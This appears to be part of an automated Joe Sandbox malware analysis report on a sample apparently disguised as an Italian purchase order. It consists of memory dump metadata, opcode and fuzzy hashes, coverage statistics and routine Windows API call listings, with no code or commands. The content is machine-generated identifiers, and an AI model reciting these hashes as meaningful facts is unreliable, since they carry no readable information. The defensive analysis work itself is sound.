                                                        • Opcode Fuzzy Hash: e4b632e13612b848d10d8a5ade9c3277ab19f0fb3048ebc7b0fab95e3f9bc3a4
                                                        • Instruction Fuzzy Hash: F8E01A74D6A118DFCF54EFA8E5808ECBBB4EB8E310F416526D40AA7244D73094448F51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 513eb77b853f5e686c367ba3c8167073db178d8cb688b36887a49bcf3b733fd8
                                                        • Instruction ID: 3979429ce92b7e5c96ee14fe8e0193cf4a63baa2cce517b0f8b02dc0ff1a3f3a
                                                        • Opcode Fuzzy Hash: 513eb77b853f5e686c367ba3c8167073db178d8cb688b36887a49bcf3b733fd8
                                                        • Instruction Fuzzy Hash: CBF09AB0944315CFDBA4EF24CD8AB6877B1FB48204F004295C80AAB2A5DB745A80CF11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1ce6889381d414e8c0a569acade8d798e8aff6f80a59ef49f3238f6e2cb238ca
                                                        • Instruction ID: 71ed3e33d6aaead6c6b87ecd39fee169fc8d23908ab56ff67073f6bf85d74257
                                                        • Opcode Fuzzy Hash: 1ce6889381d414e8c0a569acade8d798e8aff6f80a59ef49f3238f6e2cb238ca
                                                        • Instruction Fuzzy Hash: 72E0DFB0E18288AFC742DBF894812DC7FB0EF46210F1441E9C884E7A91EA340E4ADB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f436ef362677da9007704ef71ca2a7f95c6665131f1d290cdf8a3e356b441fe
                                                        • Instruction ID: 377e69da0b686b17f6a9a97984303e097ae5d0a208de11a783c4cfaf92693f55
                                                        • Opcode Fuzzy Hash: 2f436ef362677da9007704ef71ca2a7f95c6665131f1d290cdf8a3e356b441fe
                                                        • Instruction Fuzzy Hash: 6BD012B22501089E5F81FFE4E840C5277DCBB68750B448832E504CB123E721E534EB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f49741a6e0eae02b6728b173376a71336a51443c815adf025073207b5d21d0fa
                                                        • Instruction ID: a63a7c1afe946cec31cf20eea2cfbfa3e9b37bbb4ca4c71ebaf0fb04d4a402f9
                                                        • Opcode Fuzzy Hash: f49741a6e0eae02b6728b173376a71336a51443c815adf025073207b5d21d0fa
                                                        • Instruction Fuzzy Hash: 86D012B0905208DBD744DFD9E805799B77DE706226F504198E40853290EB751E40DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 252940237c7a50d77d907b2b1f85093728cb67e41feef31c699811c140954e4d
                                                        • Instruction ID: b75fa02e159092d3949e437545676f239c87dc0ce7af09061d25999cf9ce2d8f
                                                        • Opcode Fuzzy Hash: 252940237c7a50d77d907b2b1f85093728cb67e41feef31c699811c140954e4d
                                                        • Instruction Fuzzy Hash: C9D012B0905218DBD744DF99E505769777CE701216F1001A8E40853290EF752E40DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9236e3b1ad1402af6316cdb1a14b34944e97419e64cce692d1c66a5a91f4d8ac
                                                        • Instruction ID: f8bfc8359c7d3a74a6afa69e5eb369f1a0816b7bbf7bdb337fcb26fd196e8b12
                                                        • Opcode Fuzzy Hash: 9236e3b1ad1402af6316cdb1a14b34944e97419e64cce692d1c66a5a91f4d8ac
                                                        • Instruction Fuzzy Hash: AAC012B091520D9BC755DB99E401B6D77ACDB41615F104199D40853350EB711E00D795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 54325292bd86f885b6b269b7b0635580e523ae5e11792bf0a5945aaef463ed46
                                                        • Instruction ID: 24761b46523f72550b26b7115371f783569fb6d6ae46016b0560889e4512478a
                                                        • Opcode Fuzzy Hash: 54325292bd86f885b6b269b7b0635580e523ae5e11792bf0a5945aaef463ed46
                                                        • Instruction Fuzzy Hash: 23C09B75A4500CE7CF049AC4F4460FCB736DFC7137F012062D20D92050C7205D54CE40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 99d83b06af80da9e28b05d7b4f932166321979d028a41984a675582148fb94e9
                                                        • Instruction ID: ac9a387a8699682c197d2015d9f590a1dd58c66e7931a67ecd2dbbea84993fc2
                                                        • Opcode Fuzzy Hash: 99d83b06af80da9e28b05d7b4f932166321979d028a41984a675582148fb94e9
                                                        • Instruction Fuzzy Hash: 44B02B70017B0A42C3842788740D37032ACD301316FC02810B10C800902BA804C0E5C0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bdff3855621cd39ac38f594598d26ae0c4cfd3e6a036ce29998fb17074a6642e
                                                        • Instruction ID: 3251e318653353ee5ac908b7864590fb5e856e9ac0b210119b7152851898961b
                                                        • Opcode Fuzzy Hash: bdff3855621cd39ac38f594598d26ae0c4cfd3e6a036ce29998fb17074a6642e
                                                        • Instruction Fuzzy Hash: 60C08C704407088BC2083BA9F40E32437ACE709327F500010F20D400919BA808C8CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 83f47254509222f41b32fbbd00de95919a7826608c3b9f7d9aa972a85c2e8fdc
                                                        • Instruction ID: 0607dea9119bd53920ca2a6c6a00899fc40c3a038fa37d369e301c596f89a7fc
                                                        • Opcode Fuzzy Hash: 83f47254509222f41b32fbbd00de95919a7826608c3b9f7d9aa972a85c2e8fdc
                                                        • Instruction Fuzzy Hash: 72C0027084A5049FCB856B28D45D56976B4FB16306B1010F6981E9A06A8B254C42EF62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 96d611f62f98b937ef999029d141e3e751282df3a08d007a7812c8c07f8aa347
                                                        • Instruction ID: d8de4107f4fc7f033bbb8873326ca6ba48531efd0c7b19e17cabcd50d3d780d6
                                                        • Opcode Fuzzy Hash: 96d611f62f98b937ef999029d141e3e751282df3a08d007a7812c8c07f8aa347
                                                        • Instruction Fuzzy Hash: BEB012B00AB404EFC200162C840C138B575EB4130272018A0610FCE0E1C7100800FE00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 49c903a10bfa4eae78ab6f3e8846bf45d4668ae1b1a1b44c26d851cea3efda36
                                                        • Instruction ID: df72c84dee8021d30c9f73a3a764288b23373eba8084fd652b7d02741b56b8bf
                                                        • Opcode Fuzzy Hash: 49c903a10bfa4eae78ab6f3e8846bf45d4668ae1b1a1b44c26d851cea3efda36
                                                        • Instruction Fuzzy Hash: 09A14936E00215CFCF09DFA9C8405AEB7B2FF85300B2545AFE805AB265DB35E956CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8265bc655f2248057acabe4d08486d86fb34957558acfafe135be9864eb9632
                                                        • Instruction ID: bcd46ba75d7da4440ff5ca3b00190d9a128b91a361a0167fd2115659298ad655
                                                        • Opcode Fuzzy Hash: e8265bc655f2248057acabe4d08486d86fb34957558acfafe135be9864eb9632
                                                        • Instruction Fuzzy Hash: CD811AB5D1420A9FDF21CFA9C880AAEBBB1FB49320F14846AE446E7351D335DD81CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 35b47c6472644bdd580aa3867a923caa4ff716ffecb73734411a9c22fc451cdb
                                                        • Instruction ID: 8b66a65435ac2cf8200531a6a946e7bf59c5f607fd91a236b7cc00cb0a1b8510
                                                        • Opcode Fuzzy Hash: 35b47c6472644bdd580aa3867a923caa4ff716ffecb73734411a9c22fc451cdb
                                                        • Instruction Fuzzy Hash: A0617FB0E102198FDB15DFAAC5405AEBBB2FF89304F24C16AD408AB356D7309D42CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 822423c12a502f366c655b7a870284798eadff84cfefb127f65cd3e24641a49b
                                                        • Instruction ID: 60dbb3717deae798abb5ccff15a24cb65a286ae5c50b7e9f50efb3ba19678d0c
                                                        • Opcode Fuzzy Hash: 822423c12a502f366c655b7a870284798eadff84cfefb127f65cd3e24641a49b
                                                        • Instruction Fuzzy Hash: 9B511CB0E006198FCB14DFA9C5805AEFBF2BF89314F24C169D419AB356D7315942CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f1535990e479ec5b8554360e08a4875571f2768b32531b7fef2907beb0772229
                                                        • Instruction ID: baeb0f6b8a0eb2d1475a8d6f1c53b18d9ba88d1d1acdd66f22fb379ff7022de9
                                                        • Opcode Fuzzy Hash: f1535990e479ec5b8554360e08a4875571f2768b32531b7fef2907beb0772229
                                                        • Instruction Fuzzy Hash: DB512BB0E116198FCB14DFA9C9805AEFBF2BF89304F24C169D418A7356D7319942CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-390881366
                                                        • Opcode ID: 7fda244277b8c2e1331736257f5659243c20b066d946a87f6ca2f365db01f4b8
                                                        • Instruction ID: abb626efe60278907d6302ec16d99cba7cf05244d936e8d4a8849bfed6d42ee1
                                                        • Opcode Fuzzy Hash: 7fda244277b8c2e1331736257f5659243c20b066d946a87f6ca2f365db01f4b8
                                                        • Instruction Fuzzy Hash: 2BF13D38A41208CFCB59EF69D594A6EB7B2BF94340F24842DD4059B769DB31EC86CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: 343d8f5048c65cf2d3c11c7b988e7c3b53f4c7de7cdaed2c78909b38dc701742
                                                        • Instruction ID: 89da4c74268b3909a4248a718943ca1a6d8148839a688e865cb74ba4576d400c
                                                        • Opcode Fuzzy Hash: 343d8f5048c65cf2d3c11c7b988e7c3b53f4c7de7cdaed2c78909b38dc701742
                                                        • Instruction Fuzzy Hash: AAB15C34A416188FDB14EFA9E59069EBBB2FF84301F24842DE405DB7A5DB74DC86CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LR^q$LR^q$$^q$$^q
                                                        • API String ID: 0-2454687669
                                                        • Opcode ID: 233bc1fd4c2706c25dcd23c5ac81544818bcf7b78c76be1a825e73c80b2e2529
                                                        • Instruction ID: 6d22bb0a1cb5ad3a5107b3641f0e2203c14754f9e3cab6d5bab99d11744de865
                                                        • Opcode Fuzzy Hash: 233bc1fd4c2706c25dcd23c5ac81544818bcf7b78c76be1a825e73c80b2e2529
                                                        • Instruction Fuzzy Hash: 3851BE34B406059FCB19EF2CE940A6EB7E2FF89340F108569E4069B7A9DB31EC45CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:9.7%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:135
                                                        Total number of Limit Nodes:7

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 0108D176
                                                        • GetCurrentThread.KERNEL32 ref: 0108D1B3
                                                        • GetCurrentProcess.KERNEL32 ref: 0108D1F0
                                                        • GetCurrentThreadId.KERNEL32 ref: 0108D249
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686559731.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1080000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID: 4'^q
                                                        • API String ID: 2063062207-1614139903
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 0108D176
                                                        • GetCurrentThread.KERNEL32 ref: 0108D1B3
                                                        • GetCurrentProcess.KERNEL32 ref: 0108D1F0
                                                        • GetCurrentThreadId.KERNEL32 ref: 0108D249
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686559731.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1080000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0108B0C6
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686559731.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1080000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05051E02
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1689260650.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_5050000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05051E02
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1689260650.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_5050000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 010859C9
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686559731.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1080000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 33703c5707460be2fe8f44aa278536d4ab00478b8608c437028f25571513d70d
                                                        • Instruction ID: 4915515eb3e312d5fd8099aa99d861318b86ec5bcd372129a76f29a191076d53
                                                        • Opcode Fuzzy Hash: 33703c5707460be2fe8f44aa278536d4ab00478b8608c437028f25571513d70d
                                                        • Instruction Fuzzy Hash: 2C41D2B0C00719CEDB24DFA9C884BDDBBF5BF89304F24819AD488AB255DB755986CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05054381
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1689260650.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_5050000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: 6ee286b26f1d4a4c40b5534b5e64a05d214224e0897ac22480a035918f258438
                                                        • Instruction ID: e65e049ffd5934c388f09f89dbf1fa703550d5aee82788952139e289c40e4fd6
                                                        • Opcode Fuzzy Hash: 6ee286b26f1d4a4c40b5534b5e64a05d214224e0897ac22480a035918f258438
                                                        • Instruction Fuzzy Hash: 5341F8B49003058FCB14CF99D488AAFBBF5FF88324F258459E519AB321D774A881CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 010859C9
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686559731.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1080000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: d2d35d7c096612fd65f35abceb34a3262d4a37b9ebc390e3896de32d14422a76
                                                        • Instruction ID: dc3fab25d8c36ee673b7e8722f13a57af38ec8fe7b39e7adb9d26dc98ddcea42
                                                        • Opcode Fuzzy Hash: d2d35d7c096612fd65f35abceb34a3262d4a37b9ebc390e3896de32d14422a76
                                                        • Instruction Fuzzy Hash: 5841E2B0C00719CBDB24DFA9C8846CEBBF5BF89304F24806AD448AB255DB755985CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0108D3C7
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686559731.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1080000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: f8c36e12aa667c9a19ce2444a7f98fc2980b36388084964b8a973d27c3bf1c89
                                                        • Instruction ID: c475ab3ef2e37a5d7eb2184eda7667df594ca2e0391eb21db8ef5d9dc5fa7cb3
                                                        • Opcode Fuzzy Hash: f8c36e12aa667c9a19ce2444a7f98fc2980b36388084964b8a973d27c3bf1c89
                                                        • Instruction Fuzzy Hash: 7921E0B5900218DFDB10CFAAE584ADEBBF5EB48310F14841AE958A3350C374A954CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0108D3C7
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686559731.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1080000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 40a09f6f3db9600f88e618a767cda58e2e9c31e0ef540801d77ed13c22af66e8
                                                        • Instruction ID: ca882d230d061d7ea9538bb0db282b6ea642fa982993c608abad24e800f8b839
                                                        • Opcode Fuzzy Hash: 40a09f6f3db9600f88e618a767cda58e2e9c31e0ef540801d77ed13c22af66e8
                                                        • Instruction Fuzzy Hash: 0221E2B5900308DFDB10CFAAD984ADEBFF8EB48320F14841AE958A3350D374A940CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0108B141,00000800,00000000,00000000), ref: 0108B352
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686559731.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1080000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: a5795b39dca25b79ccbbc2c76bb130bfebb714d0e03a335344f10de99dba3ee8
                                                        • Instruction ID: 77ca6d8ca999f1fdb9acba7b2e1c4f5111bb273a1fb500f75faf9db28f5c017e
                                                        • Opcode Fuzzy Hash: a5795b39dca25b79ccbbc2c76bb130bfebb714d0e03a335344f10de99dba3ee8
                                                        • Instruction Fuzzy Hash: AF1153B28043088FDB20DF9AC444ADEFBF4EB88310F10802EE999A7210C374A944CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0108B141,00000800,00000000,00000000), ref: 0108B352
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686559731.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1080000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 58b401dba1ea4dbae8f05cbfb2c21065df23ce08efdfa62ee6872b60ae054ac8
                                                        • Instruction ID: 0b48ebd4f9eacf136cedd24d28f2de6fe67efbf218f316a339393238282deeda
                                                        • Opcode Fuzzy Hash: 58b401dba1ea4dbae8f05cbfb2c21065df23ce08efdfa62ee6872b60ae054ac8
                                                        • Instruction Fuzzy Hash: 5A1112B68003499FDB24DFAAD444ADEFBF4AB88310F14846AD999A7210C375A545CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 0736B978
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1691028872.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7360000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: ff50ec9ed47d011472151cd5b7237a2fea2d9b1d174adff11fca9b1c3f5df234
                                                        • Instruction ID: 7a558d4cf16e8c15c377349778fe4984845ec4fe952bc26e93588585842d39ef
                                                        • Opcode Fuzzy Hash: ff50ec9ed47d011472151cd5b7237a2fea2d9b1d174adff11fca9b1c3f5df234
                                                        • Instruction Fuzzy Hash: 621122B5800359CFDB20DF9AD549BDEFBF4EB48320F20842AD558A7650D738A984CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0108B0C6
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1686559731.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1080000_FNOqSQ.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
